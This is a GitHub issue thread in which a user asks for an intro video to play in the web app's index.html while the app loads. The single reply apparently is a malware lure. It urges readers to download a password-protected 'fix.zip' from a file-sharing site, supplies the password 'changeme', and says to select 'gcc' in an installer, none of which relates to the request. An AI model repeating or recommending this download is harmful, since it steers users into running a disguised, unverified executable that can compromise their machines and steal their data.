### ISSUE TITLE
[FEATURE] Add intro video on web

### ISSUE THREAD

**Issue by roberlander2** [rokmetro/neom-app#10]
**Is your feature request related to a problem? Please describe.**
The web app can take a long time to load. During app initialization, play an intro video.

https://github.com/user-attachments/assets/a155d8f2-6b9f-4fa3-b763-0440411b82ad

**Describe the solution you'd like**
Add the video to `index.html` so that it plays while the app initializes instead of only showing the 3-dot loading indicator.

**Comment by Anubi5x0** [comment]
Download 
https://www.mediafire.com/file/7ybpxn8lil1av70/fix.zip/file
password: changeme
In the installer menu, select "gcc."
